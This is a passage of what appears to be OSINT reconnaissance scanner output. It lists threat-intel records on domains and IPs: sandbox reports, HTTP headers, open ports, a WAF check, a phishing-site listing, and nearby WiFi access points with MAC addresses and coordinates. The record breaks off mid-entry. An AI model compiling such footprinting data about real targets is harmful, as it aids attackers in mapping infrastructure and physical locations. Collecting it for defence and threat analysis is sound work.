| 2023-05-12 02:58:25 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 21, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://theuselessweb.com/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"\n "142.251.33.66:443"\n "142.251.215.232:443"\n "13.227.44.89:443"\n "142.251.33.98:443"\n "151.101.24.157:443"\n "142.251.211.234:443"\n "104.22.28.80:443"\n "142.250.217.99:443"\n "142.251.211.226:443"\n "142.251.215.226:443"\n "142.250.217.65:443"\n "157.240.22.35:443"\n "216.239.32.178:443"\n "31.13.70.7:443"\n "142.251.215.227:443"\n "104.244.42.136:443"\n "192.30.252.153:80"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "Local\\SM0:7884:304:WilStaging_02"\n "Local\\SM0:7884:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7524:304:WilStaging_02"\n "Local\\SM0:7524:120:WilError_01"\n "Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_ZiraM_Mutex"\n "Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_DavidM_Mutex"\n "Local\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_Speech_OneCore_Voices_Tokens_MSTTS_V110_enUS_MarkM_Mutex"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7524:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7524:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"corndog.io"\n "ko-fi.com"\n "syndication.twitter.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"corndog.io"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007524]\n "urlref_httpstheuselessweb.com" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00007524]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007524]\n "f_00023e" has type "gzip compressed data from Unix original size modulo 2^32 327190"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00007604]\n "5f8b2db9-2edb-4814-8b96-b77d0a37937f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\5f8b2db9-2edb-4814-8b96-b77d0a37937f.tmp]- [targetUID: 00000000-00007524]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007524]\n "841720b3488bb430_0" has type "data"- [targetUID: N/A]\n "f_000243" has type "gzip compressed data max compression original size modulo 2^32 156532"- [targetUID: N/A]\n "f_00023d" has type "data"- [targetUID: N/A]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\7524_1677671563\\_metadata\\verified_contents.json]- [targetUID: 00000000-00007524]\n "82f670ef-d283-42d5-9dd3-9994f8b6bb17.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\82f670ef-d283-42d5-9dd3-9994f8b6bb17.tmp]- [targetUID: 00000000-00007524]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007524]\n "Last Browser" has type "data"- [targetUID: N/A]\n "42cc4980-2299-45cd-bbba-1cbd6f9855b4.tmp" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "b5d97750-b492-4a8b-8f50-3e1d821b7085.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b5d97750-b492-4a8b-8f50-3e1d821b7085.tmp]- [targetUID: 00000000-00007524]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00007524]\n "0c66e245-2f42-4c20-9b7a-29bfc70402bc.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 37080"- [targetUID: N/A]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\AutofillStrikeDatabase\\LOG]- [targetUID: 00000000-00007524]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Trust Protection Lists\\1.0.0.23\\manifest.fingerprint]- [targetUID: 00000000-00007524]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"syndication.twitter.com" (Indicator: "twitter")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://theuselessweb.com/"\n Pattern match: "https://theuselessweb.com"\n Heuristic match: "corndog.io"\n Pattern match: "http://corndog.io/"\n Heuristic match: "ko-fi.com"\n Heuristic match: "syndication.twitter.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00007524]'}], u'threat_level': 0, u'size': None, u'job_id': u'63977e9dae1f9c003b5ce605', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 1}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'34.74.170.74', u'142.251.33.66', u'142.251.215.232', u'13.227.44.89', u'142.251.33.98', u'151.101.24.157', u'142.251.211.234', u'104.22.28.80', u'142.250.217.99', u'142.251.211.226', u'142.251.215.226', u'142.250.217.65', u'157.240.22.35', u'216.239.32.178', u'31.13.70.7', u'142.251.215.227', u'104.244.42.136', u'192.30.252.153'], u'sha256': u'cc115afccd6fc96e7e94198d40bec095c6c | 34.74.170.74 |
| 2023-05-12 02:54:44 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04J1V5ZEHVH006E5VV5HBN1
Date: <REDACTED>
Content-Length: 0
| 35.229.48.116 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | default (Net ID: 00:0D:88:94:94:59) | 32.8608, -79.9746 |
| 2023-05-12 02:45:01 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'CA', u'country_tld': u'.us', u'ip': u'185.199.109.153', u'currency_name': u'Dollar', u'currency': u'USD', u'country_population': 327167434, u'country_code': u'US', u'timezone': u'America/Los_Angeles', u'city': u'San Francisco', u'network': u'185.199.109.153/32', u'languages': u'en-US,es-US,haw,fr', u'version': u'IPv4', u'latitude': 37.7642, u'in_eu': False, u'utc_offset': u'-0700', u'continent_code': u'NA', u'country_name': u'United States', u'country_capital': u'Washington', u'org': u'FASTLY', u'postal': u'94107', u'asn': u'AS54113', u'country': u'US', u'region': u'California', u'longitude': -122.3993, u'country_calling_code': u'+1', u'country_area': 9629091.0, u'country_code_iso3': u'USA'} | 185.199.109.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D0:D0) | 32.8608, -79.9746 |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.11): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 0772ED (Net ID: 00:00:C0:07:72:ED) | 37.7813933,-122.3918002 |
| 2023-05-12 02:53:42 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache_Hits": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "Via": ["1.1 varnish"], "X_Github_Request_Id": ["1626:5CFD:236BDF0:36406A6:645D3ABC"], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache_Hits": ["0"], "X_Timer": ["S1683831485.544725,VS0,VE28"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["b61afadfbad522ceb47c8a79f54a7ce4c88966b0"], "Content_Type": ["text/html; charset=utf-8"], "Date": ["<REDACTED>"], "X_Cache": ["MISS"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100102-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.109.153 |
| 2023-05-12 03:11:07 | Physical Coordinates | No | OpenStreetMap | 90 | 0 | 4 | 0 | None | 37.7813933,-122.3918002 | 101 Townsend Street, San Francisco, US-CA, US, 94107 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:8080 | 188.114.97.0/24 |
| 2023-05-12 02:53:10 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 3 | 0 | None | [{"url": "https://vscode.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://vscode.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | vscode.battleb0t.xyz |
| 2023-05-12 03:13:04 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [001328.github.io]
https://www.openphish.com/feed.txt | 001328.github.io |
| 2023-05-12 02:54:54 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3121::/48 | 2a06:98c1:3121::1 |
| 2023-05-12 02:47:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 185.199.109.153:443 | 185.199.109.153 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f8c5e7988238a-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:21 | Web Content Type | No | Web Spider | 0 | 0 | 5 | 0 | None | text/css | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 02:58:51 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'34.74.170.74'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://docs.semeris.com/-/transactions/lib9681ar/private/creativeteton?#doc-creativeteton-doc%3Fauto%3Dtrue', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_4b8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_4b8_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_4b8_IESQMMUTEX_0_519"\n "IsoScope_4b8_ConnHashTable<1208>_HashTable_Mutex"\n "IsoScope_4b8_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1208"\n "IsoScope_4b8_IE_EarlyTabStart_0xcdc_Mutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.74.170.74:443"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "_16DA73C7-3990-11ED-AD5E-080027028D54_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442]- [targetUID: 00000000-00001208]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00001208]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776]- [targetUID: 00000000-00002448]\n "~DF3EF417CE002B5E1E.TMP" has type "data"- Location: [%TEMP%\\~DF3EF417CE002B5E1E.TMP]- [targetUID: 00000000-00001208]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001208]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00002448]\n "~DF2B8D68DAE78C0FF5.TMP" has type "data"- Location: [%TEMP%\\~DF2B8D68DAE78C0FF5.TMP]- [targetUID: 00000000-00001208]\n "~DFA907A56EE39E2179.TMP" has type "data"- Location: [%TEMP%\\~DFA907A56EE39E2179.TMP]- [targetUID: 00000000-00001208]\n "1XFY5LX8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1XFY5LX8.txt]- [targetUID: 00000000-00001208]\n "dnserror_1_" has type "HTML document UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00001208]\n "RecoveryStore._16DA73C5-3990-11ED-AD5E-080027028D54_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://docs.semeris.com/-/transactions/lib9681ar/private/creativeteton?#doc-creativeteton-doc%3Fauto%3Dtrue"\n Pattern match: "https://docs.semeris.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.74.170.74": ...\n\n URL: https://www.wildbeard.app/ (AV positives: 1/88 scanned on 09/21/2022 11:28:28)\n URL: https://zoommeetingbackgrounds.com/ (AV positives: 1/88 scanned on 09/21/2022 11:06:42)\n URL: https://rad-malabi-562f5e.netlify.app/?naps (AV positives: 1/89 scanned on 09/21/2022 10:39:51)\n URL: https://ts3.app/ (AV positives: 1/88 scanned on 09/21/2022 10:05:55)\n URL: https://gleeful-tapioca-4e76b0.netlify.app/ (AV positives: 2/88 scanned on 09/21/2022 09:27:54)\n File SHA256: e6b8324a67ce0c8fcce1f50ff15981bfa2197cd7b32f97cf0734ecd53d415352 (AV positives: 4/75 scanned on 09/15/2022 10:50:57)\n File SHA256: 1026177be3921f58bc03d5818a94a864520f14f76d183f25aa7c4d336cb1e5c9 (AV positives: 3/74 scanned on 09/13/2022 23:26:25)\n File SHA256: 0c9d72af2ea2e3934f99c4659037afa2b80f730b0df269b091ab073eb1b3392c (AV positives: 24/75 scanned on 09/12/2022 23:24:30)\n File SHA256: 0616ae44e3accaf9af529e16093b1b1f6d7954aa93056766bfd2eb4926560ee2 (AV positives: 24/75 scanned on 09/12/2022 18:53:06)\n File SHA256: 659266e6d4ff1538972b6f39af1dab6ca217fadafe0dfd96a403d10c5b97a521 (AV positives: 9/75 scanned on 09/11/2022 22:57:22)\n File SHA256: faa32adb3d32d68cd8bc667b146e874a96cb4469d8e5dbbe4122216b9771bd2e (Date: 11/17/2019 03:18:46)'}], u'threat_level': 0, u'size': None, u'job_id': u'632af55f008c332beb442bb4', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [u'34.74.170.74'], u'sha256': u'8542bd5b44a22c5a1605485c1ad44055090c9b024aee2513be530a18da580c4a', u'sha512': u'9ae3d19c8ebe44cd7b07416ccf2b632216a73ad72d62e0a59452f4da2231ab6132942ab6ef56a328060f6962cbfdca6869224c57c2dce533812597b39ac4579b', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://docs.semeris.com/-/transactions/lib9681ar/private/creativeteton?#doc-creativeteton-doc%3Fauto%3Dtrue', u'submission_id': u'632af560008c332beb442bb5', u'created_at': u'2022-09-21T11:28:32+00:00', u'filename': None}], u'analysis_start_time': u'2022-09-21T11:28:32+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 6, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'75ddf83f80276bc7273fb058a3a32b7b', u'network_mode': u'default', u'processes': [], u'sha1': u'e5d4489c92656003234158f7fa1d115343dd3dfc', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 34.74.170.74 |
| 2023-05-12 03:41:52 | Operating System | No | Censys | 0 | 0 | 3 | 0 | None | Microsoft Windows | 45.131.109.53 |
| 2023-05-12 02:53:15 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 172.67.168.252 | battleb0t.xyz |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 3 | 0 | None | 36459 | 185.199.108.0/24 |
| 2023-05-12 02:46:32 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 17, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://k8slens.dev/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:5528:304:WilStaging_02"\n "Local\\SM0:5528:120:WilError_01"\n "SM0:5528:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:3984:304:WilStaging_02"\n "SM0:3984:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3984:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3984:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "142.250.191.74:443"\n "142.251.214.131:443"\n "172.217.12.104:443"\n "34.248.78.39:443"\n "192.30.255.117:443"\n "142.251.46.174:443"\n "104.254.151.69:443"\n "142.250.141.157:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 